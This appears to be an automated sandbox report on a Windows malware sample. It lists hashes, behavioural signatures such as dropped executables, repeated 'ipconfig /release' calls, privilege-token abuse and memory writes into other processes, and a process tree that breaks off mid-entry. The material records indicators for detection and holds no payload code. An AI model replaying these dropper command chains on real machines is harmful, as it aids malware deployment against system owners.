5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1

Analysis

max time kernel
149s
max time network
136s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
11/03/2024, 21:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
Size

361KB
MD5

ad9a8ff45ebc40af2cb5d07ed709f57e
SHA1

f3d334c9b70dc1e9ab192f5e37cd198782707ba1
SHA256

5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1
SHA512

c17c77f9cd587547540532465f041a3a65fc15c57237a470a01a5e94b0b2a8ca0acf06bcda8bcf6258e5e8f3c6f58a6b675cb4ceafade7afa2f30683b7ff82c2
SSDEEP

6144:rflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:rflfAsiVGjSGecvX

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 64 IoCs

pid	Process
1820	cwrpjhbwuomgbytr.exe
2388	CreateProcess.exe
2584	gavtnlfays.exe
2496	CreateProcess.exe
2888	CreateProcess.exe
1032	i_gavtnlfays.exe
1652	CreateProcess.exe
2108	kfdxvpkhca.exe
1676	CreateProcess.exe
1680	CreateProcess.exe
1812	i_kfdxvpkhca.exe
2192	CreateProcess.exe
296	ausnhfzxrm.exe
1852	CreateProcess.exe
1128	CreateProcess.exe
2108	i_ausnhfzxrm.exe
772	CreateProcess.exe
1960	xspkecwupj.exe
496	CreateProcess.exe
2320	CreateProcess.exe
2328	i_xspkecwupj.exe
2548	CreateProcess.exe
2204	jhczuomgez.exe
2800	CreateProcess.exe
556	CreateProcess.exe
576	i_jhczuomgez.exe
1664	CreateProcess.exe
3024	cwuojgbzto.exe
2424	CreateProcess.exe
2404	CreateProcess.exe
1876	i_cwuojgbzto.exe
1000	CreateProcess.exe
1044	zwrobvtolg.exe
2288	CreateProcess.exe
2152	CreateProcess.exe
1556	i_zwrobvtolg.exe
2996	CreateProcess.exe
1640	oigbytnlgd.exe
2160	CreateProcess.exe
376	CreateProcess.exe
1660	i_oigbytnlgd.exe
2196	CreateProcess.exe
2228	dbvtnigays.exe
1724	CreateProcess.exe
1312	CreateProcess.exe
2916	i_dbvtnigays.exe
2520	CreateProcess.exe
3052	vqnicavsnh.exe
1656	CreateProcess.exe
2952	CreateProcess.exe
1984	i_vqnicavsnh.exe
1028	CreateProcess.exe
1876	snlfaxsqke.exe
1588	CreateProcess.exe
916	CreateProcess.exe
1964	i_snlfaxsqke.exe
1636	CreateProcess.exe
2980	hfaxsmkfcx.exe
2992	CreateProcess.exe
1556	CreateProcess.exe
2152	i_hfaxsmkfcx.exe
904	CreateProcess.exe
1516	zxsmkecxrp.exe
2216	CreateProcess.exe

Loads dropped DLL 62 IoCs

pid	Process
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
2584	gavtnlfays.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
2108	kfdxvpkhca.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
296	ausnhfzxrm.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
1960	xspkecwupj.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
2204	jhczuomgez.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
3024	cwuojgbzto.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
1044	zwrobvtolg.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
1640	oigbytnlgd.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
2228	dbvtnigays.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
3052	vqnicavsnh.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
1876	snlfaxsqke.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
2980	hfaxsmkfcx.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
1516	zxsmkecxrp.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
1744	smhezxrlje.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
2744	pjhbzuomge.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
2644	hbwuomgbyt.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
2140	wqojgbvtnl.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
912	ljdbvqniga.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
1988	lgdysqkidx.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
580	aysqkfdxvp.exe
1820	cwrpjhbwuomgbytr.exe

Gathers network information 2 TTPs 20 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1204	ipconfig.exe
344	ipconfig.exe
1612	ipconfig.exe
2460	ipconfig.exe
2352	ipconfig.exe
1144	ipconfig.exe
2924	ipconfig.exe
1924	ipconfig.exe
1632	ipconfig.exe
2676	ipconfig.exe
2116	ipconfig.exe
2236	ipconfig.exe
1728	ipconfig.exe
1780	ipconfig.exe
2324	ipconfig.exe
1796	ipconfig.exe
2100	ipconfig.exe
1264	ipconfig.exe
2404	ipconfig.exe
1740	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e861098c19b4244d8627ee4664a96069000000000200000000001066000000010000200000009a88d77d380698231adfc627b0b10e59de1a63d571cfa6ba6190d03fb6b65e13000000000e80000000020000200000007bdff787e51fb150342ed117e2b4119a324181c6639b9c26dd41b04d5bb71ea3900000002f335bbde3e04d9fe50d8537d0f8a93b5d1167725e524b482fab292f3b4dffb613230fae96742412368d981bbb9751136918b62f8cb740e5975eb4333c81d2a74e52d2f27b4f878508b92d1d5f134ccfa39d6fe4712fd5539ecb023b3989088ac943a590f356194c2a3baca69860765ca2e526feae594318ed4ec98fba738b92b692835912e3e4fb2b500ce180fb267e40000000928d8ae299790260113774801e7b0aa92b0b87a4afc10c4e3c9dcfd9049cb25c3e0447116103d864908022d965ed804fa7f91fb7acbe23827b1751d28baf88de	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "416356162"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e861098c19b4244d8627ee4664a9606900000000020000000000106600000001000020000000b886c0d0755b1d1514de0ef337b98736e589d8398a6d2734249852bb74f11992000000000e800000000200002000000001caefbff6555f2730b699ffd659e50c8e5d2d75b719d325a885bb173018764a20000000e2bdff0accffbf0c2fd964250779a0c54f06fd28aa453f97c142d7dd649b42454000000028ca88f3304a5a7fcbf8c204a27775af61ce8e1f30c3c9ec640508d2fde8e6d93a2994dbcd08e26412ab38efffc4f9484c4e497ca3cf428f98fa4e679c8e7038	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7472C3B1-DFF2-11EE-9891-EEF45767FDFF} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10b2b64bff73da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
1820	cwrpjhbwuomgbytr.exe
2584	gavtnlfays.exe
2584	gavtnlfays.exe
2584	gavtnlfays.exe
2584	gavtnlfays.exe
2584	gavtnlfays.exe
2584	gavtnlfays.exe
2584	gavtnlfays.exe
1032	i_gavtnlfays.exe
1032	i_gavtnlfays.exe
1032	i_gavtnlfays.exe
1032	i_gavtnlfays.exe
1032	i_gavtnlfays.exe
1032	i_gavtnlfays.exe
1032	i_gavtnlfays.exe
2108	kfdxvpkhca.exe
2108	kfdxvpkhca.exe
2108	kfdxvpkhca.exe
2108	kfdxvpkhca.exe
2108	kfdxvpkhca.exe
2108	kfdxvpkhca.exe
2108	kfdxvpkhca.exe
1812	i_kfdxvpkhca.exe
1812	i_kfdxvpkhca.exe
1812	i_kfdxvpkhca.exe
1812	i_kfdxvpkhca.exe
1812	i_kfdxvpkhca.exe
1812	i_kfdxvpkhca.exe
1812	i_kfdxvpkhca.exe
296	ausnhfzxrm.exe

Suspicious behavior: LoadsDriver 21 IoCs

pid	Process
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	1032	i_gavtnlfays.exe
Token: SeDebugPrivilege	1812	i_kfdxvpkhca.exe
Token: SeDebugPrivilege	2108	i_ausnhfzxrm.exe
Token: SeDebugPrivilege	2328	i_xspkecwupj.exe
Token: SeDebugPrivilege	576	i_jhczuomgez.exe
Token: SeDebugPrivilege	1876	i_cwuojgbzto.exe
Token: SeDebugPrivilege	1556	i_zwrobvtolg.exe
Token: SeDebugPrivilege	1660	i_oigbytnlgd.exe
Token: SeDebugPrivilege	2916	i_dbvtnigays.exe
Token: SeDebugPrivilege	1984	i_vqnicavsnh.exe
Token: SeDebugPrivilege	1964	i_snlfaxsqke.exe
Token: SeDebugPrivilege	2152	i_hfaxsmkfcx.exe
Token: SeDebugPrivilege	1348	i_zxsmkecxrp.exe
Token: SeDebugPrivilege	2728	i_smhezxrlje.exe
Token: SeDebugPrivilege	2856	i_pjhbzuomge.exe
Token: SeDebugPrivilege	2956	i_hbwuomgbyt.exe
Token: SeDebugPrivilege	1128	i_wqojgbvtnl.exe
Token: SeDebugPrivilege	1012	i_ljdbvqniga.exe
Token: SeDebugPrivilege	784	i_lgdysqkidx.exe
Token: SeDebugPrivilege	3024	i_aysqkfdxvp.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1648	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1648	iexplore.exe
1648	iexplore.exe
2668	IEXPLORE.EXE
2668	IEXPLORE.EXE
2668	IEXPLORE.EXE
2668	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1312 wrote to memory of 1820	1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe	28
PID 1312 wrote to memory of 1820	1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe	28
PID 1312 wrote to memory of 1820	1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe	28
PID 1312 wrote to memory of 1820	1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe	28
PID 1312 wrote to memory of 1648	1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe	29
PID 1312 wrote to memory of 1648	1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe	29
PID 1312 wrote to memory of 1648	1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe	29
PID 1312 wrote to memory of 1648	1312	5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe	29
PID 1648 wrote to memory of 2668	1648	iexplore.exe	30
PID 1648 wrote to memory of 2668	1648	iexplore.exe	30
PID 1648 wrote to memory of 2668	1648	iexplore.exe	30
PID 1648 wrote to memory of 2668	1648	iexplore.exe	30
PID 1820 wrote to memory of 2388	1820	cwrpjhbwuomgbytr.exe	31
PID 1820 wrote to memory of 2388	1820	cwrpjhbwuomgbytr.exe	31
PID 1820 wrote to memory of 2388	1820	cwrpjhbwuomgbytr.exe	31
PID 1820 wrote to memory of 2388	1820	cwrpjhbwuomgbytr.exe	31
PID 2584 wrote to memory of 2496	2584	gavtnlfays.exe	33
PID 2584 wrote to memory of 2496	2584	gavtnlfays.exe	33
PID 2584 wrote to memory of 2496	2584	gavtnlfays.exe	33
PID 2584 wrote to memory of 2496	2584	gavtnlfays.exe	33
PID 1820 wrote to memory of 2888	1820	cwrpjhbwuomgbytr.exe	37
PID 1820 wrote to memory of 2888	1820	cwrpjhbwuomgbytr.exe	37
PID 1820 wrote to memory of 2888	1820	cwrpjhbwuomgbytr.exe	37
PID 1820 wrote to memory of 2888	1820	cwrpjhbwuomgbytr.exe	37
PID 1820 wrote to memory of 1652	1820	cwrpjhbwuomgbytr.exe	39
PID 1820 wrote to memory of 1652	1820	cwrpjhbwuomgbytr.exe	39
PID 1820 wrote to memory of 1652	1820	cwrpjhbwuomgbytr.exe	39
PID 1820 wrote to memory of 1652	1820	cwrpjhbwuomgbytr.exe	39
PID 2108 wrote to memory of 1676	2108	kfdxvpkhca.exe	41
PID 2108 wrote to memory of 1676	2108	kfdxvpkhca.exe	41
PID 2108 wrote to memory of 1676	2108	kfdxvpkhca.exe	41
PID 2108 wrote to memory of 1676	2108	kfdxvpkhca.exe	41
PID 1820 wrote to memory of 1680	1820	cwrpjhbwuomgbytr.exe	44
PID 1820 wrote to memory of 1680	1820	cwrpjhbwuomgbytr.exe	44
PID 1820 wrote to memory of 1680	1820	cwrpjhbwuomgbytr.exe	44
PID 1820 wrote to memory of 1680	1820	cwrpjhbwuomgbytr.exe	44
PID 1820 wrote to memory of 2192	1820	cwrpjhbwuomgbytr.exe	46
PID 1820 wrote to memory of 2192	1820	cwrpjhbwuomgbytr.exe	46
PID 1820 wrote to memory of 2192	1820	cwrpjhbwuomgbytr.exe	46
PID 1820 wrote to memory of 2192	1820	cwrpjhbwuomgbytr.exe	46
PID 296 wrote to memory of 1852	296	ausnhfzxrm.exe	48
PID 296 wrote to memory of 1852	296	ausnhfzxrm.exe	48
PID 296 wrote to memory of 1852	296	ausnhfzxrm.exe	48
PID 296 wrote to memory of 1852	296	ausnhfzxrm.exe	48
PID 1820 wrote to memory of 1128	1820	cwrpjhbwuomgbytr.exe	51
PID 1820 wrote to memory of 1128	1820	cwrpjhbwuomgbytr.exe	51
PID 1820 wrote to memory of 1128	1820	cwrpjhbwuomgbytr.exe	51
PID 1820 wrote to memory of 1128	1820	cwrpjhbwuomgbytr.exe	51
PID 1820 wrote to memory of 772	1820	cwrpjhbwuomgbytr.exe	53
PID 1820 wrote to memory of 772	1820	cwrpjhbwuomgbytr.exe	53
PID 1820 wrote to memory of 772	1820	cwrpjhbwuomgbytr.exe	53
PID 1820 wrote to memory of 772	1820	cwrpjhbwuomgbytr.exe	53
PID 1960 wrote to memory of 496	1960	xspkecwupj.exe	55
PID 1960 wrote to memory of 496	1960	xspkecwupj.exe	55
PID 1960 wrote to memory of 496	1960	xspkecwupj.exe	55
PID 1960 wrote to memory of 496	1960	xspkecwupj.exe	55
PID 1820 wrote to memory of 2320	1820	cwrpjhbwuomgbytr.exe	58
PID 1820 wrote to memory of 2320	1820	cwrpjhbwuomgbytr.exe	58
PID 1820 wrote to memory of 2320	1820	cwrpjhbwuomgbytr.exe	58
PID 1820 wrote to memory of 2320	1820	cwrpjhbwuomgbytr.exe	58
PID 1820 wrote to memory of 2548	1820	cwrpjhbwuomgbytr.exe	60
PID 1820 wrote to memory of 2548	1820	cwrpjhbwuomgbytr.exe	60
PID 1820 wrote to memory of 2548	1820	cwrpjhbwuomgbytr.exe	60
PID 1820 wrote to memory of 2548	1820	cwrpjhbwuomgbytr.exe	60

C:\Users\Admin\AppData\Local\Temp\5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe
"C:\Users\Admin\AppData\Local\Temp\5bf0a2b6b059c419eb32832a4cdf7eb438d9521520471d1065962e7902e3d7e1.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1312
- C:\Temp\cwrpjhbwuomgbytr.exe
  C:\Temp\cwrpjhbwuomgbytr.exe run
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1820
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\gavtnlfays.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2388
  - - C:\Temp\gavtnlfays.exe
      C:\Temp\gavtnlfays.exe ups_run
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:2496
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2460
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_gavtnlfays.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2888
  - - C:\Temp\i_gavtnlfays.exe
      C:\Temp\i_gavtnlfays.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1032
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\kfdxvpkhca.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1652
  - - C:\Temp\kfdxvpkhca.exe
      C:\Temp\kfdxvpkhca.exe ups_run
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2108
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:1676
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2352
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_kfdxvpkhca.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1680
  - - C:\Temp\i_kfdxvpkhca.exe
      C:\Temp\i_kfdxvpkhca.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1812
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\ausnhfzxrm.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2192
  - - C:\Temp\ausnhfzxrm.exe
      C:\Temp\ausnhfzxrm.exe ups_run
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:296
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:1852
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:1796
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_ausnhfzxrm.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1128
  - - C:\Temp\i_ausnhfzxrm.exe
      C:\Temp\i_ausnhfzxrm.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2108
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\xspkecwupj.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:772
  - - C:\Temp\xspkecwupj.exe
      C:\Temp\xspkecwupj.exe ups_run
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1960
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:496
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:1728
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_xspkecwupj.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2320
  - - C:\Temp\i_xspkecwupj.exe
      C:\Temp\i_xspkecwupj.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2328
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\jhczuomgez.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2548
  - - C:\Temp\jhczuomgez.exe
      C:\Temp\jhczuomgez.exe ups_run
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2204
    - - C:\temp\CreateProcess.exe
        
